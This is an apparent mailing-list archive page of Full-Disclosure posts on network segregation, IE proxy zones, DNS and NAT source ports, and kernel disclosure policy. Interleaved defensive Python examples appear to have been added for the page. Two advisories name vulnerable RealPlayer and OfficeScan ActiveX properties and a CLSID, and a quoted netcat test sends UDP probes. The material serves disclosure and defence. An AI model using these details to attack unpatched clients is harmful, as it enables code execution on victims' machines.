>> > collected information is then sent to the criminals who will
>use it to
>> > steal from you.
>> 
>> > KeyScrambler defeats keyloggers by encrypting your
>keystrokes at the
>> > keyboard driver level, deep within the operating system. When
>the
>> encrypted
>> > keystrokes reach your browser, KeyScrambler then decrypts
>them
>> so you
>> > see exactly the keys you've typed. Keyloggers can only record
>the
>> > encrypted keys, which are completely indecipherable."
>> 
>> > Can this be trusted? As in trusted I mean not bypassed.
>> 
>> > Input from the professional
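
The triage Dave and Chris describe above (unzip the XPI, read the .js, run strings over the bundled binaries) can be scripted. The following is an added example written for this page, not code from the thread or from the KeyScrambler add-on: it builds a small constructed XPI in memory as a stand-in and walks it the same way, inventorying entries, identifying PE images by their MZ/PE headers rather than by extension, pulling printable strings to look for library banners such as the OpenSSL version Elazar mentions, and noting which scripts reach for native components. The file layout, script text and embedded strings are all constructed.

```python
import io
import re
import struct
import zipfile


def _fake_pe(payload):
    """Build a minimal PE-looking blob for the constructed sample:
    64-byte DOS header with e_lfanew (offset 0x3c) pointing at 'PE\\0\\0'."""
    hdr = bytearray(b"MZ" + b"\x00" * 62)
    struct.pack_into("<I", hdr, 0x3C, 64)
    return bytes(hdr) + b"PE\x00\x00" + payload


# Constructed stand-in for an add-on package (an assumption, not the real XPI layout).
_buf = io.BytesIO()
with zipfile.ZipFile(_buf, "w") as _zf:
    _zf.writestr("install.rdf", "<RDF/>")
    _zf.writestr("chrome/content/overlay.js",
                 "var drv = Components.classes['@example/driver;1'];  // constructed")
    _zf.writestr("components/setup.exe",
                 _fake_pe(b"\x00" * 16 + b"OpenSSL 0.9.8a 11 Oct 2005\x00"
                          + b"KeyScrambler.sys\x00"))
    _zf.writestr("chrome/icon.png", b"\x89PNG\r\n\x1a\n")
SAMPLE_XPI = _buf.getvalue()

OPENSSL_RE = re.compile(r"OpenSSL (\d+\.\d+\.\d+[a-z]?)")


def is_pe(data):
    """True if data has a DOS stub whose e_lfanew points at a PE signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    off = struct.unpack_from("<I", data, 0x3C)[0]
    return data[off:off + 4] == b"PE\x00\x00"


def strings(data, min_len=6):
    """ASCII equivalent of strings(1): printable runs of at least min_len bytes."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]


def triage_xpi(xpi_bytes):
    """Inventory an XPI (a zip): scripts that touch native components,
    PE binaries with any OpenSSL banner and driver (.sys) references, and the rest."""
    report = {"scripts": {}, "binaries": {}, "other": []}
    with zipfile.ZipFile(io.BytesIO(xpi_bytes)) as zf:
        for info in zf.infolist():
            data = zf.read(info.filename)
            if info.filename.endswith(".js"):
                text = data.decode("utf-8", "replace")
                report["scripts"][info.filename] = [
                    ln.strip() for ln in text.splitlines()
                    if "Components.classes" in ln or ".sys" in ln]
            elif is_pe(data):
                found = strings(data)
                report["binaries"][info.filename] = {
                    "size": len(data),
                    "openssl": [m.group(1) for s in found for m in OPENSSL_RE.finditer(s)],
                    "driver_refs": [s for s in found if s.lower().endswith(".sys")],
                }
            else:
                report["other"].append(info.filename)
    return report


if __name__ == "__main__":
    print(triage_xpi(SAMPLE_XPI))
```

Replace SAMPLE_XPI with the bytes of a real package to run it on an actual add-on. The Authenticode signature on the extracted driver (the GlobalSign signature Elazar mentions) is checked separately with sigcheck or signtool on Windows; a valid signature says who signed the driver, not what it does, so the strings and the script-to-driver call path are still worth reading.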

Re: [Full-disclosure] vswitches: physical networks obsolete?

2011-02-07 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

We grappled with the same problem when setting up a virtual host in
order to mimic our production environment for training purposes.
Ultimately, we ended up purchasing a separate box for our DMZ host;
it is hard to trust separation in software (granted, we are relying
on the firewall to do the very same thing; however, if you can't
trust your firewall to do what it was designed to do, then you have
bigger problems than vSwitches) vs. a 10ft pole (physical
segregation). A vSwitch is essentially like a single physical
switch, so...

Would you put your internal and DMZ networks on a single physical
switch, segregated via VLAN, relying on your FW to handle routing
and access control? Now (as you stated) add the fact that virtual
host owned = complete ownage whereas say owning a switch still
won't (necessarily) own the network(i.e IPSEC etc.), would you
still do it?

my .02

elazar

On Sun, 06 Feb 2011 09:47:39 -0500 phocean <0...@phocean.net> wrote:
>Hi all,
>
>I would like to get some feedback about the vswitches and how to deal
>with physical network separation.
>I have an idea about this but I would like to know the consensus of the
>security community to feel more comfortable with it.
>
>There is a great article summing up the possible architectures:
>http://bradhedlund.com/2010/02/10/vswitch-illusion-dmz-
>virtualization/
>
>However, Brad carefully doesn't take position on whether physical
>separation of the DMZ is still a necessity.
>Somehow, as a Cisco employee, he may not be able to...
>
>He just mentions how vswitches are equivalent to VLANs on a physical
>switch and that the multiple vswitches on ESX are just a GUI illusion
>of physical separation. It is exactly the same code running in memory
>whether there is one or an infinite number of vswitches.
>
>Within the comments, one guy says physical networks are obsolete,
>but
>without stuff to support it.
>
>Personally, I am still convinced it is necessary and want to keep
>it
>like this :
>Internet--|FW|--[ESX/Nexus for DMZ]---|FW|---[ESX/Nexus for
>Secured LAN]
>
>I just can't trust the code and the idea of a single exploit
>compromising a whole datacenter is just frightening.
>
>I remember a black hat presentation that showed many ways to
>compromise
>the host.
>On the other hand, I couldn't find any good specifications or
>architecture documents from the editors describing their software
>design.
>It would be great to know what protections are in place to make
>exploits
>harder (memory management design, NX, randomization, MAC)...
>
>In short, what is your stake on it? Is physical networking
>obsolete and
>what can prove it is?
>
>Regards,
>- phocean
>
>
>___
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/
-BEGIN PGP SIGNATURE-
Charset: UTF8
Version: Hush 3.0
Note: This signature can be verified at https://www.hushtools.com/verify

wpwEAQECAAYFAk1QTSgACgkQi04xwClgpZjyzQP+JOOGuFo3P0zgwzxUvIJfk7an+xwS
AL2h7gf2PDgpsd7XjzozjtEXa5dXhyFJMcPdIZIU1skPnggPq0SywzvenGGGOtT2kxAi
bj70s3XfdWYSEI8QiQGSrenZmvccBBDFL15APaBNIxn7OUEULyRTuPdAEsEIRvsgkoj/
KXQJ6NY=
=dphJ
-END PGP SIGNATURE-



Re: [Full-disclosure] Other recommended lists?

2011-02-21 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

(never start a sentence with)And just to be the grammar douche,
that should be:


With the latTer as the majority of course.



elazar
On Mon, 21 Feb 2011 14:32:36 -0500 Christian Sciberras
 wrote:
>I agree, you should move your business to IRC. They usually cover
>everything
>from cute kittens imitating Barack Obama to troubled kids sharing
>theiruhpersonal photos...
>With the later as the majority of course. Oh, and if you want to
>be the
>coolest internet kid around, with best-of-breed language skillz,
>teh ircz iz
>foru.
>
>
>
>
>
>
>
>On Mon, Feb 21, 2011 at 8:19 PM, Jeffrey Walton
> wrote:
>
>> On Mon, Feb 21, 2011 at 2:11 PM, Cal Leeming [Simplicity Media
>Ltd]
>>  wrote:
>> > For accurate definitions of what trolling is, see this:
>> > http://www.urbandictionary.com/define.php?term=trolling
>> > Top definition is:
>> > "Being a prick on the internet because you can. Typically
>unleashing one
>> or
>> > more cynical or sarcastic remarks on an innocent by-stander,
>because it's
>> > the internet and, hey, you can."
>>
>> http://www.collegehumor.com/video:1926079
>>
>> [SNIP]
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
-BEGIN PGP SIGNATURE-
Charset: UTF8
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 3.0

wpwEAQECAAYFAk1ixqsACgkQi04xwClgpZgscgP/at9GSVya75sXGU88KuTVqCalW6Lb
ucF1KjEntODf70pSdWd+WDJvfVb46BY5M7Md1oqD33VJ3RLZ2pcWv82r2W+0JIX24OIY
z8TY4ehSGY2xV1kI5HikFeqOEpebNcV4yLvkwE2hu+xdAi+JkPziWkRxUY7eTRGK+JFU
SJdMsDA=
=xPol
-END PGP SIGNATURE-



Re: [Full-disclosure] Other recommended lists?

2011-02-21 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

No, just playing the stereotype...

On Mon, 21 Feb 2011 15:17:43 -0500 Christian Sciberras
 wrote:
>Interested in proof reading my texts? Might take a full time job
>though.
>
>No? Well, then shut it. :)
>
>
>
>
>
>
>On Mon, Feb 21, 2011 at 9:10 PM, Elazar Broad
> wrote:
>
>> -BEGIN PGP SIGNED MESSAGE-
>> Hash: SHA1
>>
>> (never start a sentence with)And just to be the grammar douche,
>> that should be:
>>
>> 
>> With the latTer as the majority of course.
>> 
>>
>>
>> elazar
>> On Mon, 21 Feb 2011 14:32:36 -0500 Christian Sciberras
>>  wrote:
>> >I agree, you should move your business to IRC. They usually
>cover
>> >everything
>> >from cute kittens imitating Barack Obama to troubled kids
>sharing
>> >theiruhpersonal photos...
>> >With the later as the majority of course. Oh, and if you want
>to
>> >be the
>> >coolest internet kid around, with best-of-breed language
>skillz,
>> >teh ircz iz
>> >foru.
>> >
>> >
>> >
>> >
>> >
>> >
>> >
>> >On Mon, Feb 21, 2011 at 8:19 PM, Jeffrey Walton
>> > wrote:
>> >
>> >> On Mon, Feb 21, 2011 at 2:11 PM, Cal Leeming [Simplicity
>Media
>> >Ltd]
>> >>  wrote:
>> >> > For accurate definitions of what trolling is, see this:
>> >> > http://www.urbandictionary.com/define.php?term=trolling
>> >> > Top definition is:
>> >> > "Being a prick on the internet because you can. Typically
>> >unleashing one
>> >> or
>> >> > more cynical or sarcastic remarks on an innocent by-
>stander,
>> >because it's
>> >> > the internet and, hey, you can."
>> >>
>> >> http://www.collegehumor.com/video:1926079
>> >>
>> >> [SNIP]
>> >>
>> >> ___
>> >> Full-Disclosure - We believe in it.
>> >> Charter: http://lists.grok.org.uk/full-disclosure-
>charter.html
>> >> Hosted and sponsored by Secunia - http://secunia.com/
>> >>
>> -BEGIN PGP SIGNATURE-
>> Charset: UTF8
>> Note: This signature can be verified at
>https://www.hushtools.com/verify
>> Version: Hush 3.0
>>
>>
>wpwEAQECAAYFAk1ixqsACgkQi04xwClgpZgscgP/at9GSVya75sXGU88KuTVqCalW6L
>b
>>
>ucF1KjEntODf70pSdWd+WDJvfVb46BY5M7Md1oqD33VJ3RLZ2pcWv82r2W+0JIX24OI
>Y
>>
>z8TY4ehSGY2xV1kI5HikFeqOEpebNcV4yLvkwE2hu+xdAi+JkPziWkRxUY7eTRGK+JF
>U
>> SJdMsDA=
>> =xPol
>> -END PGP SIGNATURE-
>>
>>
-BEGIN PGP SIGNATURE-
Charset: UTF8
Version: Hush 3.0
Note: This signature can be verified at https://www.hushtools.com/verify

wpwEAQECAAYFAk1izIwACgkQi04xwClgpZgIrgP/QWLR8pzikul2aNuZiVhVYoHLUUfj
PaHrERkl4a+e3KCzWZn86JSJ3MtPszrudGfZHjQCcgOgOydDBUKH10wq1/9VY5JMebNJ
bw6HpENCdtFmE074kqvSFkgpzW7zF4IgWWjybulRCI1I+leNlQae9HOgHQ9lO3VEECdE
D2hChgQ=
=GVyp
-END PGP SIGNATURE-



[Full-disclosure] Proxy Autoconfiguration and Internet Explorer Zones

2008-07-10 Thread Elazar Broad
I got an interesting issue with Internet Explorer(6 and 7 on 
Windows XP SP2) and proxy auto-configuration files. I was wondering 
if anyone has a similar setup and is experiencing behavior like 
this. My setup is as follows. Client machines are configured to use 
a PAC file via group policy. The pac file specifies a direct 
connection(via the DIRECT instruction) for a specific sub-net. The 
pac file is retrieved from a web server on the internal network. 
Now, when Internet Explorer connects to an external site, it 
normally is in the Internet Zone. Now, in this scenario, any 
external sites are ending up in the Local Intranet zone even though 
Internet Explorer is connecting directly to the external site(I 
have verified this through a packet capture). Logically, the DIRECT 
instruction should place any external sites in the Internet Zone, 
not Local Intranet, that is if Internet Explorer can properly 
differentiate what is on the local network or not. I guess if it 
can't then this whole issue is moot.

Elazar



Re: [Full-disclosure] Proxy Autoconfiguration and Internet Explorer Zones

2008-07-10 Thread Elazar Broad
Probably, I completely missed that, and they do seem to be the 
defaults. I'll test it out tomorrow. Thanks Paul!

On Thu, 10 Jul 2008 22:31:56 -0400 Paul Szabo 
<[EMAIL PROTECTED]> wrote:
>Elazar,
>
>> ... Internet Explorer [with] proxy auto-configuration ...
>> The pac file specifies a direct connection for a specific sub-
>net.
>> ... ending up in the Local Intranet zone ...
>
>When going to Tools InternetOptions Security LocalIntranet Sites,
>my IE7 has all of
>  Include all local (intranet) sites not listed in other zones
>  Include all sites that bypass the proxy server
>  Include all network paths (UNCs)
>selected/ticked. Would unticking the second (or all) fix this?
>(I do not know whether those are default settings; that last 
>setting
>seems dangerous or at least counter-intuitive.)
>
>Cheers,
>
>Paul Szabo   [EMAIL PROTECTED]   
>http://www.maths.usyd.edu.au/u/psz/
>School of Mathematics and Statistics   University of Sydney
>Australia

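
Paul's reply lists the three Local Intranet options; the one that matches Elazar's symptom is "Include all sites that bypass the proxy server", since with that box ticked IE places any host it reaches DIRECT into the Local Intranet zone. The following is an added example written for this page, not code from the thread or from Microsoft: a Python rendering of the PAC policy Elazar describes (DIRECT for one subnet, proxy for the rest), a hypothetical contrast PAC that falls through to DIRECT for names it cannot resolve, and a simplified model of the zone rules so the interaction can be tested. The subnet 10.20.0.0/16, proxy.corp.example, the fake DNS table and the hostnames are constructed; the zone model is an approximation of the documented rules, not IE's code, and the thread does not establish what Elazar's PAC actually returned for the external sites.

```python
import ipaddress
from urllib.parse import urlsplit

# Constructed environment (assumptions, not Elazar's network): one internal
# subnet reached DIRECT, a proxy for everything else, and a fake DNS table
# standing in for the PAC dnsResolve() helper.
INTERNAL_NET = ipaddress.ip_network("10.20.0.0/16")
PROXY = "PROXY proxy.corp.example:8080"
FAKE_DNS = {
    "intranet.corp.example": "10.20.1.5",
    "fileserver": "10.20.1.9",
    "www.example.com": "93.184.216.34",
}


def dns_resolve(host):
    """Stand-in for dnsResolve(); None when the name is unknown."""
    return FAKE_DNS.get(host)


def is_in_net(host, net):
    """Stand-in for isInNet(): does the host resolve into the given network?"""
    ip = dns_resolve(host)
    return ip is not None and ipaddress.ip_address(ip) in net


def find_proxy_for_url(url):
    """The policy described in the thread: DIRECT for the internal subnet,
    proxy for everything else (fails closed to the proxy)."""
    host = urlsplit(url).hostname or ""
    return "DIRECT" if is_in_net(host, INTERNAL_NET) else PROXY


def find_proxy_leaky(url):
    """Hypothetical contrast (not the thread's PAC): falls through to DIRECT
    for anything it cannot resolve, which hands external hosts a DIRECT route."""
    host = urlsplit(url).hostname or ""
    ip = dns_resolve(host)
    if ip is None or ipaddress.ip_address(ip) in INTERNAL_NET:
        return "DIRECT"
    return PROXY


def ie_zone(url, proxy_decision, include_bypass=True, include_dotless=True):
    """Simplified model of two of the Local Intranet options Paul quotes
    (an approximation of the documented rules, not IE's code): dotless host
    names and proxy-bypassed (DIRECT) hosts land in Local Intranet when the
    matching option is ticked; everything else is Internet."""
    host = urlsplit(url).hostname or ""
    if include_dotless and "." not in host:
        return "Local Intranet"
    if include_bypass and proxy_decision.startswith("DIRECT"):
        return "Local Intranet"
    return "Internet"


def classify(url, pac=find_proxy_for_url, **zone_options):
    """(proxy decision, zone) for a URL under a given PAC and zone options."""
    decision = pac(url)
    return decision, ie_zone(url, decision, **zone_options)


if __name__ == "__main__":
    for u in ("http://intranet.corp.example/", "http://www.example.com/",
              "http://unknown.example.net/"):
        print(u, classify(u), classify(u, pac=find_proxy_leaky),
              classify(u, pac=find_proxy_leaky, include_bypass=False))
```

The security-relevant point is that a DIRECT decision is not only a routing choice: with the bypass option on, it also drops the site into a zone with weaker defaults (automatic logon with the current credentials, laxer script and ActiveX settings), so a PAC that returns DIRECT for anything it cannot classify silently widens the Local Intranet zone to the outside world. Unticking the option, as Paul suggests, or making the PAC fail closed to the proxy, closes that gap.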


Re: [Full-disclosure] DNS and NAT (was: DNS and CheckPoint)

2008-07-11 Thread Elazar Broad
I can confirm the same behavior on a Cisco PIX 501 running 6.3(5). 
Port numbers are incremented sequentially by one...

On Fri, 11 Jul 2008 11:01:33 -0400 Thomas Cross <[EMAIL PROTECTED]> 
wrote:
>Riad,
>
>Thanks for testing this. A number of other readers wrote me 
>privately
>confirming your result with linux ipchains. I'm not sure what 
>ipchains does
>when it encounters a collision, but in general I think this is a 
>good
>strategy. You'd have to have many thousands of simultaneous UDP
>transactions in order for randomly selected source ports to be 
>colliding
>frequently enough for it to present a substantial problem.
>On the other hand, I've also been contacted by readers who confirm that
>other devices besides the one imipack mentioned share its behavior. There
>appears to be room for some research here into what collision 
>avoidance
>strategies are employed by different NAT devices, what happens to 
>those
>devices under high load, and what the security implications are.
>Fortunately, Linux appears to do a good job with this right now, 
>and
>provides an example approach that NAT vendors can look to.
>I'll post more if I have time to dig into this in further 
>detail.
>
>Regards,
>Tom Cross
>IBM X-Force
>
>"Riad S. Wahby" <[EMAIL PROTECTED]>
>07/10/2008 11:06 PM
>To: Thomas Cross/Atlanta/[EMAIL PROTECTED]
>cc: full-[EMAIL PROTECTED]
>Subject: Re: DNS and NAT (was: DNS and CheckPoint)
>
>Thomas Cross <[EMAIL PROTECTED]> wrote:
>>We've also been wondering whether NAT devices ought to randomly assign
>>UDP source ports, although no NAT vendor that we're aware of has done
>>this to date.
>
>Some quick testing implies that ipchains MASQUERADE-based NAT 
>doesn't
>suffer this problem because it preserves the source port.
>
>My test setup is as follows: call the computer inside the NAT 
>Alice, and
>the computer outside Bob.  Alice contacts Bob via Trent, a linux-
>based
>router, in my case a DLink DSL-2540B DSL modem / router combo.  On
>Alice, I run the following:
>
>( for j in $(seq 1 100); do i=$RANDOM; /bin/echo -n "$i "; echo $i 
>| nc -q
>0 -vv -p $i -u  ; sleep 1; done ) &> foo.Alice
>
>On Bob, I run
>
>( while true; do nc -vv -l -u -p  -q 0  
>foo.Bob
>
>At the end, I compare the actual source port in foo.Alice to the
>apparent source port in foo.Bob.  In my setup, they are always
>identical.
>
>Obviously it is impossible to guarantee that this will always be 
>the
>case; in order to identify dangerous corner cases one would have 
>to
>consult the ipchains code, but given the relative frailty of the
>randomized source port / randomized sequence number solution, for 
>a
>small number of computers behind a NAT (e.g., home users) I claim 
>that's
>a second-order danger at best.
>
>In a large production environment where there is a huge amount of 
>NAT
>traffic being generated one would do well to consider a solution 
>like
>Thomas's suggestion that the servers be moved outside the 
>firewall.
>
>-=rsw

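
Tom asks what collision-avoidance strategies NAT devices use and what that means for resolvers behind them; Riad's test shows a Linux MASQUERADE box preserving the inside source port, and Elazar reports the PIX handing out ports that increase by one. The following is an added example written for this page, not code from the thread and not a model of any vendor's implementation: a toy stateful UDP NAT with the three allocation policies and a one-observation attacker model, to show why a sequential allocator throws away the resolver's source-port randomization while preserving or randomizing keeps it. Addresses, ports and seeds are constructed.

```python
import random

EPHEMERAL = range(1024, 65536)


class ToyNAT:
    """Stateful UDP NAT keyed on (inside ip, inside port, dst ip, dst port).

    policy 'preserve'   keep the inside source port unless it is already
                        mapped (what Riad observed on the Linux box)
    policy 'sequential' hand out ports in increasing order (the +1 behaviour
                        the thread reports for the PIX; only that is modelled)
    policy 'random'     pick an unused port uniformly at random
    """

    def __init__(self, policy, seed=0):
        if policy not in ("preserve", "sequential", "random"):
            raise ValueError(policy)
        self.policy = policy
        self.rng = random.Random(seed)
        self.next_port = EPHEMERAL.start
        self.in_use = {}   # outside port -> flow key
        self.table = {}    # flow key -> outside port

    def _alloc(self, wanted):
        if self.policy == "preserve" and wanted not in self.in_use:
            return wanted
        if self.policy == "random":
            while True:                       # retry until a free port turns up
                p = self.rng.randrange(EPHEMERAL.start, EPHEMERAL.stop)
                if p not in self.in_use:
                    return p
        # sequential allocation; also the collision fallback for 'preserve'
        for _ in EPHEMERAL:
            p = self.next_port
            self.next_port = EPHEMERAL.start + (p + 1 - EPHEMERAL.start) % len(EPHEMERAL)
            if p not in self.in_use:
                return p
        raise RuntimeError("port pool exhausted")

    def translate(self, inside_ip, inside_port, dst_ip, dst_port):
        """Outside source port for a flow, creating the mapping on first use."""
        key = (inside_ip, inside_port, dst_ip, dst_port)
        if key not in self.table:
            port = self._alloc(inside_port)
            self.table[key] = port
            self.in_use[port] = key
        return self.table[key]


def resolver_queries(nat, n, resolver_ip="10.0.0.53", seed=1):
    """n DNS queries from a resolver that randomizes its own source port
    (distinct ports, so every query creates a new mapping).
    Returns [(inside port, outside port), ...]."""
    rng = random.Random(seed)
    ports = rng.sample(range(EPHEMERAL.start, EPHEMERAL.stop), n)
    return [(sp, nat.translate(resolver_ip, sp, "192.0.2.1", 53)) for sp in ports]


def predict_next(observed_outside_port, policy):
    """The guess an off-path attacker makes after seeing one translated port."""
    if policy == "sequential":
        return observed_outside_port + 1
    return None   # a single observation gives no useful guess


def prediction_hits(policy, n=200):
    """How many of the n-1 consecutive mappings the attacker predicts exactly."""
    pairs = resolver_queries(ToyNAT(policy), n)
    return sum(1 for (_, prev), (_, cur) in zip(pairs, pairs[1:])
               if predict_next(prev, policy) == cur)


if __name__ == "__main__":
    for policy in ("preserve", "sequential", "random"):
        print(policy, prediction_hits(policy), "of 199 predicted")
```

Running prediction_hits for the three policies gives 199 of 199 for "sequential" and none for the other two. The "preserve" policy still needs a fallback for the case Tom raises (two inside hosts picking the same port towards the same destination); the toy falls back to sequential allocation there, which is exactly the predictable case, so a real device should fall back to a random free port instead.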


Re: [Full-disclosure] Oracle DB security contact email address?

2008-07-16 Thread Elazar Broad
[EMAIL PROTECTED]

http://osvdb.org/vendor/1/Oracle%20Corporation


On Wed, 16 Jul 2008 19:22:01 -0400 Kristian Erik Hermansen 
<[EMAIL PROTECTED]> wrote:
>Anyone have it?
>
>___
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/



Re: [Full-disclosure] [Dailydave] Linux's unofficial security-through-coverup policy

2008-07-17 Thread Elazar Broad
I could understand why Linus is against classifying a commit
comment in his branch or in any unstable branch for that
matter...then again, the repositories are open, and anyone with
half a brain might be able to discern what has security
ramifications or not. On the other hand, classifying commit comments
in stable branch(es) is a must, and the lack of CVE identifiers is
very troublesome.

Well, if they aren't going to do it, it's up to the community to
point it out and get the issues tracked in SecurityFocus and the like,
so that people know that it's out there and the distros along with
the general public don't have to rely on "HIGHLY SUGGESTED THAT YOU
UPGRADE" announcements from the kernel maintainers without knowing
why.

Elazar

On Thu, 17 Jul 2008 06:57:57 -0400 Dave Aitel 
<[EMAIL PROTECTED]> wrote:
>I think what Brad and the Pax Team are saying here is that:
>1. We hold Linux to a higher standard than a company - we expect 
>the 
>term "open source" to apply to more than just the source code.
>2. For that reason, the community finds it discomforting when 
>kernel 
>maintainers know that a patch has a serious security ramification 
>and 
>essentially lie about it by neglecting to put that into the patch 
>comments. That's the sort of behavior we expect from a large 
>commercial 
>entity.
>3. This only hurts end users, because the hackers already know 
>about it.
>
>If the kernel maintainers had read the Microsoft team's SDL book, 
>they'd 
>probably be more up to speed on these things. :>
>
>-dave
>
>
>
>Brad Spengler wrote:
>| Valdis,
>|
>| Please try to stay consistent with your own arguments.  If you 
>defeat
>| them yourself barely into your third paragraph, you don't give 
>me much
>| to do!
>|
>| To summarize:
>|
>|> have any untrusted local users - for instance, my laptop.  The 
>only users
>|> on it are me, myself, and I<, and the guy that owned my 
>webserver, or
>| the guy that owned my email client, or the guy that owned my 
>audio
>| player, or the guy that owned my video player, or the guy that 
>owned my
>| web browser, or the guy that owned my FTP client, or the guy 
>that owned
>| my PDF reader, or the guy that owned my office application>
>|
>| You're a very trusting individual!
>|
>| This is exactly why telling someone to update if they have any
>| "untrusted local users" just doesn't make any sense since it 
>misleads a
>| majority of users.  A better replacement would be "if your 
>machine is
>| network-connected."  How do you own a website if you can't break 
>into it
>| directly?  Find out what other websites are hosted on the same 
>machine,
>| break into one of them, then locally escalate privileges, giving 
>you
>| access to all the websites hosted on the machine.  If you don't 
>think
>| this happens, you've got your head in the sand and honestly 
>should just
>| give up having anything to do with security.
>|
>| -Brad
>|
>| -
>|
>| ___
>| Dailydave mailing list
>| [EMAIL PROTECTED]
>| http://lists.immunitysec.com/mailman/listinfo/dailydave



Re: [Full-disclosure] [Dailydave] Linux's unofficial security-through-coverup policy

2008-07-17 Thread Elazar Broad
Sorry if I was not clear enough, I meant in the commit comments. I 
agree, you need about a brain and a half to spot kernel bugs in the 
code itself...

On Thu, 17 Jul 2008 10:58:03 -0400 Paul Schmehl 
<[EMAIL PROTECTED]> wrote:
>--On Thursday, July 17, 2008 10:35:21 -0400 Elazar Broad 
><[EMAIL PROTECTED]> 
>wrote:
>
>> I could understand why Linus is against classifying a commit
>> comment in his branch or in a any unstable branch for that
>> matter...then again, the repositories are open, and anyone with
>> half a brain might be able to discern what has security
>> ramifications or not.
>
>Apparently this isn't as true as you'd like to think.  If it were, 
>the folks 
>who write the code would have caught it to begin with.  After all, 
>anyone who 
>can write kernel code that works has *at least* half a brain, 
>wouldn't you say?
>
>The truth is, there is a very small pool of people smart enough, 
>educated 
>enough and familiar with the code in question enough to actually 
>spot security 
>problems in the code.  Those folks are worth their weight in gold, 
>but in many 
>cases they do it for the pure pleasure of finding the bugs.  They 
>also only 
>focus on those things that interest them, so the number of people 
>actually 
>looking for security issues in the Linux kernel code is
>infinitesimally small 
>compared to the number of people who use the compiled product.
>
>Claiming that "anyone with half a brain" can spot security 
>problems in code 
>belittles both those who actually can and all those who cannot but 
>want to be 
>informed about them so they can protect themselves.
>
>-- 
>Paul Schmehl
>As if it wasn't already obvious,
>my opinions are my own and not
>those of my employer.
>
>___
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/



Re: [Full-disclosure] signature for DNS vulnerability?

2008-07-25 Thread Elazar Broad
Or this http://www.emergingthreats.net/content/view/87/1/

On Fri, 25 Jul 2008 14:22:22 -0400 "Albert R. Campa" 
<[EMAIL PROTECTED]> wrote:
>check this out
>http://securabit.com/2008/07/24/latest-snort-signature-to-detect-
>dns-vulnerability/
>
>
>On Fri, Jul 25, 2008 at 12:59 PM, crazy frog crazy frog
><[EMAIL PROTECTED]> wrote:
>> Hi All,
>>
>> Is is possible to write a snort rule for DNS
>vulnerability?please let
>> me know if anyone has it.
>>
>> Thanks,
>> _CF
>> http://secgeeks.com
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>___
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/



[Full-disclosure] Real Networks RealPlayer ActiveX Heap Use After Free Vulnerability

2008-07-25 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Who:
Real Networks

What:
RealPlayer 11 (11.0.0 - 11.0.2  builds 6.0.14.738 - 6.0.14.802)
RealPlayer 10.5 (6.0.12.1040-6.0.12.1663, 6.0.12.1698, 6.0.12.1741)
RealPlayer 10
RealPlayer Enterprise

How:
The WindowName and Controls properties of rmoc3260.dll do not
manage heap memory properly, resulting in a use-after-free condition
which can overwrite heap management structures and lead to code
execution. Note that this is the same issue that affected the
Console property, which was fixed in RealPlayer 11.0.2 (rmoc3260.dll
version 6.0.10.50); the WindowName and Controls properties were not
fixed at that time.

Fix:
Real Networks has released fixes for this issue, please see
http://service.real.com/realplayer/security/07252008_player/en/

Elazar
-BEGIN PGP SIGNATURE-
Charset: UTF8
Version: Hush 3.0
Note: This signature can be verified at https://www.hushtools.com/verify

wpwEAQECAAYFAkiKMhgACgkQi04xwClgpZhFRAP9EEcawIxaC8gVfJhHKfNMj9/+xIfu
1Tqe5SayZCWSqO2vFdLdc6S9cRF72lcMbrnylnY4cmsVOyWUkCmU/cEup93BWt7LTbv1
c80pTPPxeTY2KTE+4ihrdFenVdlQuuwJfcG+krbtE1wV0NHeTzopEP1Cr0SqEajwquI7
obKXpek=
=/9UE
-END PGP SIGNATURE-



[Full-disclosure] Trend Micro OfficeScan ObjRemoveCtrl ActiveX Control Buffer Overflow Vulnerability

2008-07-28 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Who:
Trend Micro
http://www.trendmicro.com

What:
OfficeScan 7.3 build 1343(Patch 4) and older
http://www.trendmicro.com/download/product.asp?productid=5

How:
OfficeScan's Web Console utilizes several ActiveX controls when
deploying the product through the web interface. One of these
controls, objRemoveCtrl, is vulnerable to a stack-based buffer
overflow when embedded in a webpage. The one caveat to this issue
is that the control must be embedded in such a way that it CAN be
visible, i.e. obj = new ActiveXObject() will not work. The issue
lies in the code that is used to display certain properties and
their values on the control when it is embedded in a page.

OfficeScanRemoveCtrl.dll, version 7.3.0.1020
{5EFE8CB1-D095-11D1-88FC-0080C859833B}
Commonly located: systemdrive\Windows\Downloaded Program Files
CAB location on server: officescan install
path\OfficeScan\PCCSRV\Web_console\ClientInstall\RemoveCtrl.cab


The following properties are vulnerable:

HttpBased
LatestPatternServer
LatestPatternURL
LocalServerPort
MasterDirectory
MoreFiles
PatternFilename
ProxyLogin
ProxyPassword
ProxyPort
ProxyServer
RegistryINIFilename
Server
ServerIniFile
ServerPort
ServerSubDir
ServiceDisplayName
ServiceFilename
ServiceName
ShellExtensionFilename
ShortcutFileList
ShortcutNameList
UninstallPassword
UnloadPassword
UseProxy

Workaround:
Set the killbit for the affected control. See
http://support.microsoft.com/KB/240797

Fix:
As stated in the timeline below, there are reportedly patches for this
issue; however, I have been able to exploit it in a test environment
running OfficeScan 7.3 Patch 4 (the latest available patch).

Timeline:
